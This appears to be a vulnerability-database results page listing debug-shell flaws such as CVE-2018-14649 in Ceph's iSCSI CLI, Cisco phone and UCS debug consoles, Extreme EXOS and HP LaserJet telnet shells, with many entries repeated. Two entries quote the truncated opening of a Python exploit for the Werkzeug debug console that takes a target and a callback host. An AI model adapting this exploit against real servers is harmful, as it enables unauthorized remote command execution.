Red Hat Ceph Storage ceph-isci-cli package remote command injection vulnerability

Red Hat Ceph Storage is a suite of scalable, open software-defined storage platforms from Red Hat, Inc. ceph-isci-cli is one of the command-line programs. A security vulnerability exists in the ceph-isci-cli package in Red Hat Ceph Storage versions 2 and 3. An attacker could use this vulnerabilit...

CVE-2018-14649

It was found that ceph-isci-cli package as shipped by Red Hat Ceph Storage 2 and 3 is using python-werkzeug in debug shell mode. This is done by setting debug=True in file /usr/bin/rbd-target-api provided by ceph-isci-cli package. This allows unauthenticated attackers to access this debug shell a...

CVE-2018-14649

It was found that ceph-isci-cli package as shipped by Red Hat Ceph Storage 2 and 3 is using python-werkzeug in debug shell mode. This is done by setting debug=True in file /usr/bin/rbd-target-api provided by ceph-isci-cli package. This allows unauthenticated attackers to access this debug shell a...

Design/Logic Flaw

It was found that ceph-isci-cli package as shipped by Red Hat Ceph Storage 2 and 3 is using python-werkzeug in debug shell mode. This is done by setting debug=True in file /usr/bin/rbd-target-api provided by ceph-isci-cli package. This allows unauthenticated attackers to access this debug shell a...

CVE-2018-14649

It was found that ceph-isci-cli package as shipped by Red Hat Ceph Storage 2 and 3 is using python-werkzeug in debug shell mode. This is done by setting debug=True in file /usr/bin/rbd-target-api provided by ceph-isci-cli package. This allows unauthenticated attackers to access this debug shell a...

PT-2018-12640 · Pallets Projects +1 · Python-Werkzeug +1

Name of the Vulnerable Software and Affected Versions: Red Hat Ceph Storage versions 2 and 3 Description: The issue allows unauthenticated attackers to access a debug shell and escalate privileges. This is due to the ceph-isci-cli package using python-werkzeug in debug shell mode, enabled by...

CVE-2018-0015 AppFormix: Debug Shell Command Execution in AppFormix Agent

A malicious user with unrestricted access to the AppFormix application management platform may be able to access a Python debug console and execute system commands with root privilege. The AppFormix Agent exposes the debug console on a host where AppFormix Agent is executing. If the host is...

Werkzeug - 'Debug Shell' Command Execution

!/usr/bin/env python import requests import sys import re import urllib usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if lensys.argv != 5: print "USAGE: python %s " % sys.argv0 sys.exit-1 response = requests.get'http://%s:%s/console' % sys.argv1,sys.argv2 if "Werkzeug " not in...

Werkzeug - Debug Shell Command Execution

Werkzeug - Debug Shell Command Execution !/usr/bin/env python import requests import sys import re import urllib usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if lensys.argv != 5: print "USAGE: python %s " % sys.argv0 sys.exit-1 response = requests.get'http://%s:%s/console' %...

Cisco IP Phone 8800 Series Command Injection Vulnerability in Debug Shell

A vulnerability in the debug interface of Cisco IP Phone 8800 series could allow an authenticated, local attacker to execute arbitrary commands. SPDX-FileCopyrightText: 2017 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective rig...

Cisco IP Phone 8800 Series Command Injection Vulnerability in Debug Shell

A vulnerability in the debug interface of Cisco IP Phone 8800 series could allow an authenticated, local attacker to execute arbitrary commands. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by authenticating to the device and submitting...

CVE-2017-14329

Extreme EXOS 16.x, 21.x, and 22.x allows administrators to obtain a root shell via vectors involving an exsh debug shell...

Design/Logic Flaw

Extreme EXOS 16.x, 21.x, and 22.x allows administrators to obtain a root shell via vectors involving an exsh debug shell...

CVE-2017-14329

Extreme EXOS 16.x, 21.x, and 22.x allows administrators to obtain a root shell via vectors involving an exsh debug shell...

CVE-2017-14329

Extreme EXOS 16.x, 21.x, and 22.x allows administrators to obtain a root shell via vectors involving an exsh debug shell...

Cisco Small Business SPA300 and SPA500 Series IP Phones Local Code Execution Vulnerability

A vulnerability in the Cisco Small Business SPA300 and SPA500 Series IP Phones could allow an unauthenticated, local attacker to access the debug shell and file system of the affected device. The vulnerability is due to insufficient authentication implementation in the debug console interface. An...

Design/Logic Flaw

The remote debug shell on the PALO adapter card in Cisco Unified Computing System UCS allows local users to gain privileges via malformed show-macstats parameters, aka Bug ID CSCub13772...

HP LaserJet Security flaw allows remote data access

A critical vulnerability discovered in certain LaserJet Pro printers that could give remote attackers access to sensitive data. Homeland Security's Computer Emergency Response Team recently issued a vulnerability note warning that HP LaserJet Professional printers contain a telnet debug shell whi...

HP LaserJet Security flaw allows remote data access

A critical vulnerability discovered in certain LaserJet Pro printers that could give remote attackers access to sensitive data. Homeland Security’s Computer Emergency Response Team recently issued a vulnerability note warning that HP LaserJet Professional printers contain a telnet debug shell whi...

HP LaserJet Professional printer telnet debug shell vulnerability

Overview Certain HP LaserJet Professional printers contain a telnet debug shell which could allow a remote attacker to gain unauthorized access to data. Description Certain HP LaserJet Professional printers contain a telnet debug shell which could allow a remote attacker to gain unauthorized acce...